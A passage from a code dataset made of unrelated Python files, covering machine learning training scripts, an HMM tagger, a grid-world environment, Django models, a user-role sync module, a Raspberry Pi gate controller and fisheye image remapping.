sen_len, doc_len, name=None):\n feed_dict = {\n SADHA.spkrid: u,\n SADHA.domid: p,\n SADHA.input_x: x,\n SADHA.input_y: y,\n SADHA.sen_len: sen_len,\n SADHA.doc_len: doc_len\n }\n step, loss, accuracy, correct_num, mse = sess.run(\n [global_step, SADHA.loss, SADHA.accuracy, SADHA.correct_num, SADHA.mse],\n feed_dict)\n return correct_num, accuracy, mse\n\n def predict(dataset, name=None):\n acc = 0\n rmse = 0.\n print(\"speaker \",dataset.spkr[0])\n for i in range(dataset.epoch):\n if ((i+1)*100) < len(dataset.t_docs): \n# print(\"value of i \",i)\n correct_num, _, mse = predict_step(dataset.spkr[i], dataset.dom[i], dataset.docs[i],\n dataset.label[i], dataset.sen_len[i], dataset.doc_len[i], name)\n acc += correct_num\n rmse += mse\n acc = acc * 1.0 / dataset.data_size\n rmse = np.sqrt(rmse / dataset.data_size)\n return acc, rmse\n\n topacc = 0.\n toprmse = 0.\n better_dev_acc = 0.\n predict_round = 0\n\n # Training loop. For each batch...\n for tr_batch in trainbatches:\n train_step(tr_batch)\n current_step = tf.train.global_step(sess, global_step)\n if current_step % config1.evaluate_every == 0:\n predict_round += 1\n print(\"\\nEvaluation round %d:\" % (predict_round))\n\n dev_acc, dev_rmse = predict(devset, name=\"dev\")\n print(\"dev_acc: %.4f dev_RMSE: %.4f\" % (dev_acc, dev_rmse))\n test_acc, test_rmse = predict(testset, name=\"test\")\n print(\"test_acc: %.4f test_RMSE: %.4f\" % (test_acc, test_rmse))\n\n# print topacc with best dev acc\n if dev_acc >= better_dev_acc:\n better_dev_acc = dev_acc\n topacc = test_acc\n toprmse = test_rmse\n path = saver.save(sess, checkpoint_prefix, global_step=current_step)\n print(\"Saved model checkpoint to {}\\n\".format(path))\n print(\"topacc: %.4f RMSE: %.4f\" % (topacc, toprmse))\n","sub_path":"SADHAN/SADHA/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288549207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 22:59:32 2018\n\n@author: Anchit Jain\n\"\"\"\nimport numpy as np\nimport pickle\n\nclass LogisticRegression:\n def __init__(self, lr, num_iter, threshold = 0.5):\n self.lr = lr\n self.num_iter = num_iter\n self.threshold = threshold\n\n\n def __add_intercept(self,X):\n intercept = np.ones((X.shape[0], 1))\n return np.concatenate((intercept, X), axis=1)\n\n def _sigmoid(self,z):\n return 1 / (1 + np.exp(-z))\n\n def __loss(self, h, y):\n return (-y * np.log(h) - (1 - y) * np.log(1 - h)).mean()\n\n def train(self,X,y):\n X = self.__add_intercept(X)\n\n # weights initialization\n self.theta = np.zeros(X.shape[1])\n print(self.theta)\n\n for i in range(self.num_iter):\n z = np.dot(X, self.theta)\n h = self._sigmoid(z)\n gradient = np.dot(X.T, (h - y)) / y.size\n self.theta -= self.lr * gradient\n\n z = np.dot(X, self.theta)\n h = self._sigmoid(z)\n loss = self.__loss(h, y)\n\n if( i % 100 == 0):\n print(f'loss: {loss} \\t')\n filehandler = open(\"logistic_regression_model.pickle\",'wb')\n pickle.dump(self.theta,filehandler)\n filehandler.close()\n\n return True\n\n def predict(self, X):\n file = open(\"logistic_regression_model.pickle\",'rb')\n self.theta = pickle.load(file)\n X = self.__add_intercept(X)\n prob = self._sigmoid(np.dot(X, self.theta))\n return prob >= self.threshold\n def evaluate(self, test_x, test_y):\n y_predicted = self.predict(test_x)\n correct = 0\n for i,y in enumerate(test_y):\n if y == 0:\n y = False\n else:\n y = True\n if y == y_predicted[i]:\n correct = correct + 1\n total = y_predicted.size\n\n return (correct/total)*100\n","sub_path":"machine_learning/spam_classifier/oneoone/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"602769967","text":"skills = ['Python', 'C++', 'Javascript', 'Juggling', 'Running', 'Eating']\ncv = {}\nprint(\"Welcome to the special recruitment program, please answer the following questions: \")\ncv['name'] = input(\"What's your name? \")\ncv['age'] = input(\"How old are you? \")\ncv['experience'] = input(\"How many years of experience do you have? \")\ncv['skills'] = []\nprint(\"\"\"Skills:\n1- Python\n2- C++\n3- Javascript\n4- Juggling\n5- Running\n6- Eating\"\"\")\ncv['skills'].append(input(\"Choose a skill from above by entering its number: \"))\ncv['skills'].append(input(\"Choose another skill from above by entering its number: \"))\nif int(cv['age']) > 25 and int(cv['age']) < 40 and int(cv['experience']) > 3 and '1' in cv[\"skills\"]:\n print(\"You have been accepted, {}!\".format(cv['name']))\nelse:\n print(\"We're sorry, {}.\".format(cv['name']))\n","sub_path":"recruitment_program.py","file_name":"recruitment_program.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"332124402","text":"#%% IMPORT\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport itertools\n\n#%% Functions\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n#%% LOADING DATA\nclasses = {'anterior_grooming' : 0, 'posterior_grooming' : 1, 'walking' :2, 'resting' : 3}\nclasses_prediction = { 'antennal_grooming' : 0, 'eye_grooming' : 0, 'foreleg_grooming' : 0, 'hindleg_grooming' : 1, 'abdominal_grooming' : 1, 'walking' : 2, 'resting' : 3}\nbeh_df = pd.read_pickle(\"COBAR_behaviour_incl_manual_corrected.pkl\")\nlabels_manual = beh_df[\"Manual\"].values\nlabels_prediction = beh_df[\"Prediction\"].values\nlabels_prediction = np.delete(labels_prediction,labels_manual == 'abdominal_pushing')\nlabels_manual = np.delete(labels_manual,labels_manual == 'abdominal_pushing')\n\nscore = np.mean(labels_prediction == labels_manual)\n\ny_predicted = [classes_prediction[p] for p in labels_prediction]\ny_true = [classes[p] for p in labels_manual]\n \ncm_angle = confusion_matrix(y_true, y_predicted)\nplot_confusion_matrix(cm_angle, classes, normalize=True, title='Confusion matrix', cmap=plt.cm.Blues)","sub_path":"matthieu/score_basic_predicted_labels.py","file_name":"score_basic_predicted_labels.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"232624365","text":"from ornateNoun import *\nfrom random import randint\nimport linecache\n\ndef relative_pronoun():\n pronoun = linecache.getline('pronoun.txt', randint(1, 76))\n pronoun = pronoun.replace('\\n', '')\n return pronoun\n\ndef verb():\n verb = linecache.getline('verb.txt', randint(1, 163))\n verb = verb.replace('\\n', '')\n return verb\n\ndef preposition():\n preposition = linecache.getline('preposition.txt', randint(1, 59))\n preposition = preposition.replace('\\n', '')\n return preposition\n\ndef f_start():\n \"\"\"Calling this function will generate a fancy noun.\"\"\"\n f_noun = o_start()\n chance = randint(1, 3)\n\n if chance == 1:\n f_noun += \" \" + relative_pronoun()\n chance = randint(1, 2)\n if chance == 1:\n f_noun += \" \" + verb() + \" \" + f_start()\n else:\n f_noun += \" \" + f_start() + \" \" + verb()\n elif chance == 2:\n return f_noun\n elif chance == 3:\n f_noun += \" \" + preposition() + \" \" + f_start()\n return f_noun\n\nif __name__ == '__main__':\n print (f_start())\n","sub_path":"fancyNoun.py","file_name":"fancyNoun.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"80413087","text":"import argparse\nimport glob\nimport math\nimport os\nfrom collections import deque\n\nimport cv2\nimport numpy as np\nfrom scipy import io as sio\n\nfrom tensorpack.predict import OfflinePredictor, PredictConfig\nfrom tensorpack.tfutils.sessinit import get_model_loader\n\nfrom config import Config\nfrom misc.utils import rm_n_mkdir\nfrom model.graph import Model_NP_DIST, Model_NP_XY\n\nclass Inferer(Config):\n\n def __gen_prediction(self, x, predictor):\n \"\"\"\n Using 'predictor' to generate the prediction of image 'x'\n\n Args:\n x : input image to be segmented. It will be split into patches\n to run the prediction upon before being assembled back \n \"\"\" \n step_size = self.infer_mask_shape\n msk_size = self.infer_mask_shape\n win_size = self.infer_input_shape\n\n def get_last_steps(length, msk_size, step_size):\n nr_step = math.ceil((length - msk_size) / step_size)\n last_step = (nr_step + 1) * step_size\n return int(last_step), int(nr_step + 1)\n \n im_h = x.shape[0] \n im_w = x.shape[1]\n\n last_h, nr_step_h = get_last_steps(im_h, msk_size[0], step_size[0])\n last_w, nr_step_w = get_last_steps(im_w, msk_size[1], step_size[1])\n\n diff_h = win_size[0] - step_size[0]\n padt = diff_h // 2\n padb = last_h + win_size[0] - im_h\n\n diff_w = win_size[1] - step_size[1]\n padl = diff_w // 2\n padr = last_w + win_size[1] - im_w\n\n x = np.lib.pad(x, ((padt, padb), (padl, padr), (0, 0)), 'reflect')\n\n #### TODO: optimize this\n sub_patches = []\n # generating subpatches from orginal\n for row in range(0, last_h, step_size[0]):\n for col in range (0, last_w, step_size[1]):\n win = x[row:row+win_size[0], \n col:col+win_size[1]]\n sub_patches.append(win)\n\n pred_map = deque()\n while len(sub_patches) > self.infer_batch_size:\n mini_batch = sub_patches[:self.infer_batch_size]\n sub_patches = sub_patches[self.infer_batch_size:]\n mini_output = predictor(mini_batch)[0]\n mini_output = np.split(mini_output, self.infer_batch_size, axis=0)\n pred_map.extend(mini_output)\n if len(sub_patches) != 0:\n mini_output = predictor(sub_patches)[0]\n mini_output = np.split(mini_output, len(sub_patches), axis=0)\n pred_map.extend(mini_output)\n\n #### Assemble back into full image\n output_patch_shape = np.squeeze(pred_map[0]).shape\n ch = 1 if len(output_patch_shape) == 2 else output_patch_shape[-1]\n\n #### Assemble back into full image\n pred_map = np.squeeze(np.array(pred_map))\n pred_map = np.reshape(pred_map, (nr_step_h, nr_step_w) + pred_map.shape[1:])\n pred_map = np.transpose(pred_map, [0, 2, 1, 3, 4])\n pred_map = np.reshape(pred_map, (pred_map.shape[0] * pred_map.shape[1], \n pred_map.shape[2] * pred_map.shape[3], ch))\n pred_map = pred_map[:im_h,:im_w] # just crop back to original size\n\n return pred_map\n\n ####\n def run(self):\n model_path = self.inf_model_path\n\n MODEL_MAKER = Model_NP_XY if self.model_mode == 'np+xy' else Model_NP_DIST\n\n pred_config = PredictConfig(\n model = MODEL_MAKER(),\n session_init = get_model_loader(model_path),\n input_names = self.eval_inf_input_tensor_names,\n output_names = self.eval_inf_output_tensor_names)\n predictor = OfflinePredictor(pred_config)\n\n for norm_target in self.inf_norm_codes:\n norm_dir = '%s/%s/' % (self.inf_norm_root_dir, norm_target)\n norm_save_dir = '%s/%s/' % (self.inf_output_dir, norm_target)\n\n # TODO: cache list to check later norm dir has same number of files\n file_list = glob.glob('%s/*%s' % (norm_dir, self.inf_imgs_ext))\n file_list.sort() # ensure same order\n\n rm_n_mkdir(norm_save_dir) \n for 
filename in file_list:\n filename = os.path.basename(filename)\n basename = filename.split('.')[0]\n print(basename, norm_target, end=' ', flush=True)\n\n ##\n img = cv2.imread(norm_dir + filename)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n \n ##\n pred_map = self.__gen_prediction(img, predictor)\n sio.savemat('%s/%s.mat' % (norm_save_dir, basename), {'result':[pred_map]})\n print('FINISH')\n\n####\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n args = parser.parse_args()\n \n if args.gpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n n_gpus = len(args.gpu.split(','))\n\n inferer = Inferer()\n inferer.run() \n","sub_path":"src/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"195504591","text":"# Copyright 2018 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Loaner Sync User Lib.\"\"\"\n\nimport logging\n\nfrom loaner.web_app import constants\nfrom loaner.web_app.backend.auth import permissions\nfrom loaner.web_app.backend.clients import directory\nfrom loaner.web_app.backend.models import user_model\n\n_DIR_CALL_INVALID_MSG = (\n 'The call to the Directory client is invalid because: %s.')\n\n\nclass Error(Exception):\n \"\"\"Default error class for this module.\"\"\"\n\n\nclass InvalidCallToDirectoryError(Error):\n \"\"\"Raised when the call to Directory client is invalid.\"\"\"\n\n\ndef sync_user_roles():\n \"\"\"Syncs all of the elevated user roles for each user in Google groups.\"\"\"\n logging.info(\n 'Using admin account (%s) to sync users.', constants.ADMIN_USERNAME)\n directory_client = directory.DirectoryApiClient(\n user_email=constants.ADMIN_USERNAME)\n technical_admin_users_from_group = _get_users_directory(\n constants.TECHNICAL_ADMINS_GROUP, directory_client)\n operational_admin_users_from_group = _get_users_directory(\n constants.OPERATIONAL_ADMINS_GROUP, directory_client)\n technician_users_from_group = _get_users_directory(\n constants.TECHNICIANS_GROUP, directory_client)\n\n ndb_technical_admin_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.TECHNICAL_ADMIN_ROLE.name])).fetch(keys_only=True))\n ndb_operational_admin_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.OPERATIONAL_ADMIN_ROLE.name])).fetch(keys_only=True))\n ndb_technician_users = (\n user_model.User.query(user_model.User.roles.IN(\n [permissions.TECHNICIAN_ROLE.name])).fetch(keys_only=True))\n _add_or_remove_user_roles(\n users_keys=ndb_technical_admin_users,\n group_users=technical_admin_users_from_group,\n role=permissions.TECHNICAL_ADMIN_ROLE.name)\n _add_or_remove_user_roles(\n users_keys=ndb_operational_admin_users,\n group_users=operational_admin_users_from_group,\n role=permissions.OPERATIONAL_ADMIN_ROLE.name)\n _add_or_remove_user_roles(\n users_keys=ndb_technician_users,\n group_users=technician_users_from_group,\n role=permissions.TECHNICIAN_ROLE.name)\n\n\ndef _get_users_directory(group_email, client):\n \"\"\"Get all users from given Google Group.\n\n Args:\n group_email: str, the email used to retrieve a paged list of users.\n client: the directory client used to call the Directory API.\n\n Returns:\n user_group: a list of users for the group.\n \"\"\"\n try:\n response = client.users_in_group(group_email=group_email)\n except directory.DirectoryRPCError as err:\n raise InvalidCallToDirectoryError(\n _DIR_CALL_INVALID_MSG % str(err))\n user_group = []\n while 'nextPageToken' in response:\n for member in response['members']:\n user_group.append(member['email'])\n try:\n response = client.users_in_group(\n group_email=group_email, page_token=response.get('nextPageToken'))\n except directory.DirectoryRPCError as err:\n raise InvalidCallToDirectoryError(\n 
_DIR_CALL_INVALID_MSG % str(err))\n if 'nextPageToken' not in response:\n for member in response['members']:\n user_group.append(member['email'])\n return user_group\n\n\ndef _add_or_remove_user_roles(users_keys, group_users, role):\n \"\"\"Add or remove a user's role based on Google group membership.\n\n This will check the datastore users that are passed (ndb_users) against the\n users in the Google group that are passed (group_users). It will do nothing\n with the union of both. It will add the given role to the users that are in\n the Google group and not in the datastore users (creating a user object in\n datastore if nessesary). Similarly, it will remove the user permissions if\n the ndb_users are not in group_users.\n\n Args:\n users_keys: user_model.User obj, the user object keys from datastore.\n group_users: list, a list of users from a Google Group.\n role: str, the role to add or remove from user.\n \"\"\"\n ndb_user_ids = [user.id() for user in users_keys]\n users_to_add_role = set(group_users) - set(ndb_user_ids)\n users_to_remove_role = set(ndb_user_ids) - set(group_users)\n for user_email in users_to_add_role:\n user = user_model.User.get_user(email=user_email)\n user.roles.append(role)\n user.put()\n for user_email in users_to_remove_role:\n user = user_model.User.get_by_id(user_email)\n user.roles.remove(role)\n user.put()\n","sub_path":"loaner/web_app/backend/lib/sync_users.py","file_name":"sync_users.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"171683307","text":"from django.db import models\n\nclass Contact(models.Model):\n email_id = models.CharField(max_length=30, primary_key=True)\n password = models.CharField(max_length=128)\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n phone = models.CharField(max_length=20, blank=True, null=True)\n date_joined = models.DateTimeField()\n contacts = models.ManyToManyField(\"self\", blank=True)\n \n def __unicode__(self):\n return self.email_id\n \n class Meta:\n ordering = ['email_id']\n \nclass Mail(models.Model):\n subject = models.TextField()\n body = models.TextField()\n date_sent = models.DateTimeField()\n sent_by = models.ForeignKey(Contact, related_name=\"sent_by\")\n sent_tos = models.ManyToManyField(Contact, related_name=\"sent_tos\", through=\"SentMail\")\n \n def __unicode__(self):\n return u'%s - %s' % (self.date_sent, self.subject)\n \n class Meta:\n ordering = ['sent_by', 'date_sent']\n \nclass SentMail(models.Model):\n sent_to = models.ForeignKey(Contact)\n mail = models.ForeignKey(Mail)\n read = models.BooleanField()\n date_read = models.DateTimeField(blank=True, null=True)\n \n def __unicode__(self):\n return u'%s - %s' %(self.sent_to, self.read)\n \n class Meta:\n ordering = ['sent_to', 'read', 'date_read']\n ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"597977532","text":"from random import randint\n\nclass Environment:\n\n def __init__(self):\n # define the boundary of the Environment\n self.x_limit = 5\n self.y_limit = 5\n # define the action space\n self.action_space = [\"up\", \"left\", \"down\", \"right\"]\n # define a mapping from state to reward\n # use it to generate a mapping from (state, action) to reward\n # in this case we use the convention that\n self.goal_reward = 100\n self.goal_states = [(5,5)]\n self.reward_map = \\\n Environment.add_actions_to_reward_map({ (5,5): self.goal_reward },\n self.action_space)\n\n @staticmethod\n def add_actions_to_reward_map(reward_map, action_space):\n reward_map_with_actions = {}\n for state in reward_map:\n for action in action_space:\n (x, y) = state\n if action == \"up\":\n state_action_pair = ((x,y+1), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"left\":\n state_action_pair = ((x+1,y), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"down\":\n state_action_pair = ((x,y-1), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n elif action == \"right\":\n state_action_pair = ((x-1,y), action)\n reward_map_with_actions[state_action_pair] = reward_map[state]\n return reward_map_with_actions\n\n def initialize_q_table(self):\n q_table = {}\n for x in range(1, self.x_limit+1):\n for y in range(1, self.y_limit+1):\n for action in self.action_space:\n state = (x, y)\n q_table[(state, action)] = 0\n return q_table\n\n def reset(self):\n while True:\n x = randint(1, self.x_limit)\n y = randint(1, self.y_limit)\n if (x, y) not in self.goal_states:\n break\n return (x, y)\n\n def step(self, state, action):\n next_state = self.state_transition(state, action)\n reward = self.reward(state, action)\n if reward == self.goal_reward:\n done = True\n else:\n done = False\n return (next_state, reward, done)\n\n\n def state_transition(self, state, action):\n (x, y) = state\n if action == \"up\":\n next_state = (x, y-1)\n elif action == \"down\":\n next_state = (x, y+1)\n elif action == \"left\":\n next_state = (x-1, y)\n elif action == \"right\":\n next_state = (x+1, y)\n # check and correct for the possibility of state going out of bounds\n if next_state[0] > self.x_limit:\n return (self.x_limit, next_state[1])\n elif next_state[1] > self.y_limit:\n return (next_state[0], self.y_limit)\n elif next_state[0] < 1:\n return (1, next_state[1])\n elif next_state[1] < 1:\n return (next_state[0], 1)\n # else in bounds\n else:\n return next_state\n\n def reward(self, state, action):\n if (state, action) in self.reward_map:\n return self.reward_map[(state, action)]\n else:\n return 0\n","sub_path":"Grid_World_With_Stationary_Goal.py","file_name":"Grid_World_With_Stationary_Goal.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469194162","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"charlie\"\n\nfrom collections import Counter\nimport re\nimport codecs\nimport sets\n\nfrom classifier import SequenceClassifier\nfrom util import Ngram\n\nclass HMM(SequenceClassifier):\n \"\"\"\n This is a class implementing the Hidden Markov Model.\n \"\"\"\n\n def __init__(self):\n\n SequenceClassifier.__init__(self)\n\n self.emission = dict()\n self.transmit_p = dict()\n self.pi = dict()\n self.states = list()\n\n def clear(self):\n \"\"\"\n override\n \"\"\"\n self.emission = dict()\n self.transmit_p = dict()\n self.pi = dict()\n self.states = list()\n\n def generate_pi(self):\n \"\"\"\n to generate the inital state transition probability.\n \"\"\"\n\n it = iter(self.states)\n\n self.pi[it.next()] = 1.0\n\n for s in it:\n self.pi[s] = .0\n\n return self.pi \n\n\n\n def estimate_emission(self):\n \"\"\"\n to estimate the emission probability.\n \"\"\"\n\n tagCnt = Counter()\n # accumulate the count\n for v in self.data:\n\n for elem in v:\n\n word, tag = elem\n # tag = tag[:-1] if tag.endswith(u'\\n') else tag\n\n if tag not in self.emission:\n self.emission[tag] = dict()\n\n if word not in self.emission[tag]:\n self.emission[tag][word] = 0\n\n self.emission[tag][word] += 1\n\n tagCnt[tag] += 1\n\n\n for tag in self.emission:\n for word in self.emission[tag]:\n self.emission[tag][word] = float(self.emission[tag][word]) / tagCnt[tag]\n\n \n def estimate_transition(self):\n \"\"\"\n to estimate the transition probability.\n \"\"\"\n\n doc = []\n states = []\n \n for v in self.data:\n for elem in v:\n \n word, tag = elem\n # tag = tag[:-1] if tag.endswith(u'\\n') else tag\n\n states.append(tag)\n\n doc.append(states)\n states = []\n\n corpus = [doc]\n\n bigram = Ngram.count_ngram(corpus, 2)\n\n self.transmit_p = dict()\n for g in bigram:\n start, end = g\n\n if start not in self.transmit_p:\n self.transmit_p[start] = dict()\n\n if end not in self.transmit_p[start]:\n self.transmit_p[start][end] = bigram[g]\n\n return self.transmit_p\n\n def train(self):\n \n self.estimate_transition()\n \n self.estimate_emission()\n\n self.states = self.getClasses()\n\n self.generate_pi()\n\n\n def viterbi(self, obsv):\n\n v = [dict()]\n\n path = dict()\n\n for s in self.states:\n x = obsv[0]\n # if x not in emis[s]:\n # x = '{OTHER}'\n v[0][s] = self.emission[s][x] * self.pi[s]\n \n\n\n path[s] = [s]\n\n \n\n for i in xrange(1,len(obsv)):\n\n v.append(dict())\n\n newpath = dict()\n\n x = obsv[i]\n\n prev_x = obsv[i-1]\n\n for s in self.states:\n\n # r = []\n # for s0 in states:\n # tmp = (v[i-1][s0] * trans[s0][s] * emis[s][x], s0) \n # r.append(tmp)\n\n # prob, state = max(r)\n (prob, state) = max([(v[i-1][s0] * self.transmit_p[s0][s] * self.emission[s][x], s0) for s0 in self.states])\n\n v[i][s] = prob\n\n newpath[s] = path[state] + [s]\n\n path = newpath\n\n (prob, state) = max([(v[len(obsv) - 1][y], y) for y in self.states])\n return (prob, path[state])\n\n\n def classify(self, obsv):\n return self.viterbi(obsv)\n\ndef filterLowFreqWord(data, n=5):\n\n wordCnt = Counter()\n\n for line in data:\n\n if line == u'\\n':\n continue\n\n word = line.split(' ')[0]\n\n wordCnt[word] += 1\n\n\n lowFreqSet = sets.Set()\n\n for word in wordCnt:\n if wordCnt[word] <= n:\n lowFreqSet.add(word)\n\n newData = []\n\n for line in data:\n\n if line == u'\\n':\n newData.append(line)\n continue\n\n word = line.split(' ')[0]\n tag = line.split(' ')[1]\n\n if word in lowFreqSet:\n\n newData.append(replaceWord(word) + ' ' + tag)\n else:\n 
newData.append(line)\n\n return newData\n \n\n# #######################\n# Problem:\n# 1. new word\n# 2. float overflow\n# #######################\n\n\n","sub_path":"hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"19932995","text":"decimalDens = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]\nromanDens = [\n \"M\",\n \"CM\",\n \"D\",\n \"CD\",\n \"C\",\n \"XC\",\n \"L\",\n \"XL\",\n \"X\",\n \"IX\",\n \"V\",\n \"IV\",\n \"I\"]\n\n\ndef toRoman(dec):\n if dec <= 0:\n raise ValueError(\"It must be a positive\")\n elif dec >= 5000:\n raise ValueError(\"It must be lower than 5000\")\n\n return decToRoman(dec, \"\", decimalDens, romanDens)\n\n\ndef decToRoman(num, s, decs, romans):\n if decs:\n if num < decs[0]:\n return decToRoman(num, s, decs[1:], romans[1:])\n else:\n return decToRoman(num - decs[0], s + romans[0], decs, romans)\n else:\n return s\n","sub_path":"Project Euler/romanUtils.py","file_name":"romanUtils.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"419149119","text":"import time\n\nimport tkinter as tk\nimport RPi.GPIO as gpio\n\nRELAY_PIN = 21 # BCM PIN\nSWITCH_ON_DELAY = 1 # in seconds\n\n\ndef trigger_gate():\n print(\"Switching relay ON for two seconds...\")\n gpio.setup(RELAY_PIN, gpio.LOW) # set to LOW to turn the relay ON\n print(\"Relay swithed on. Waiting 2 seconds...\")\n\n time.sleep(SWITCH_ON_DELAY)\n\n print(\"Switching relay OFF...\")\n gpio.setup(RELAY_PIN, gpio.HIGH) # set to HIGH to turn the relay OFF\n print(\"Relay switched off...\")\n\n\ndef label_info(window):\n info_label = tk.Label(window, text=\"wysyłanie sygnału.\")\n info_label.pick(side=tk.BOTTOM)\n\n\ndef creating_layout(window):\n open_button = tk.Button(window,text=\"OPEN THE GATE\", command=trigger_gate)\n open_button.pack()\n\n\n\n\nif __name__ == '__main__':\n gpio.setmode(gpio.BCM)\n window = tk.Tk()\n creating_layout(window)\n window.title(\"Office gate\")\n\n\n window.mainloop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"626924664","text":"class Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n 给定一个没有重复数字的序列,返回其所有可能的全排列。\n \"\"\"\n\n def func(length, target, path):\n if length == target:\n array.append(path[:])\n else:\n for i in range(0, length+1):\n path = path[0:i] + [nums[length]] + path[i:length]\n func(length + 1, target, path)\n path.remove(nums[length])\n\n array = []\n tem = []\n size = len(nums)\n func(0, size, tem)\n return array\n\n\ntest = Solution()\nprint(test.permute([1, 2, 3]))\n","sub_path":"_046_permute.py","file_name":"_046_permute.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249821547","text":"# main.py\n\n# Librerias importadas\nimport fun\nimport cv2\n\n# Para medir tiempo\n#import time\n#start = time.clock()\n# En esta posicion iria el codigo a evaluar\n#print start-time.clock()\n\n# Se carga la imagen tomada con la camara VIVOTEK FE8172\nsrc = cv2.imread('./resources/IM1.jpg')\n\n# Parametros del Modelo Unificado de Imagenes\nl,m = 1,952\nu0,v0 = 960,960\n# Dimension de la proyeccion esferica deseada (nxn)\nn = 1000\n# Se mapean los puntos desde la esfera unitaria hacia el plano imagen VCA\nU,V = fun.map_sph(n,l,m,u0,v0)\n# Se proyectan los puntos desde el plano imagen VCA hacia la esfera unitaria\nsph = cv2.remap(src,U,V,cv2.INTER_NEAREST)\n\n# Punto de interes:\nu,v = 350,1100\n# Se calcula la matriz de rotacion para apuntar la esfera a un punto (u,v) dado\nMR = fun.findMR(u,v,l,m,u0,v0)\n# Se mapean los puntos desde la esfera rotada hacia la esfera original\nTheta,Phi = fun.map_sphrot(1000,MR)\n# Se proyectan los puntos desde la esfera original hacia la rotada\nsphrot = cv2.remap(sph,Theta,Phi,cv2.INTER_NEAREST)\n\n# Campo de vision deseado en [deg]\nfov = 30\n# Dimension de la imagen en perspectiva deseada\nw = 500\n# Se mapean los puntos desde el plano imagen PTZ virtual hacia la esfera rotada\nThetaR,PhiR = fun.map_ptzv(w,n,fov)\n# Se proyectan los puntos desde la esfera rotada hacia el plano imagen PTZ virtual\nptzv = cv2.remap(sphrot,ThetaR,PhiR,cv2.INTER_LINEAR)\n\n# Se muestra la imagen PTZ virtual obtenida\n#cv2.imshow('Imagen original',cv2.resize(src,(500,500)))\n#cv2.imshow('Imagen esferica',cv2.resize(sph,(500,500)))\ncv2.imshow('Imagen esferica rotada',cv2.resize(sphrot,(500,500)))\ncv2.imshow('Imagen PTZ virtual obtenida',ptzv)\n# Se reubican las ventanas\ncv2.moveWindow('Imagen esferica rotada',548,0)\ncv2.moveWindow('Imagen PTZ virtual obtenida',0,0)\n# Limpieza de las 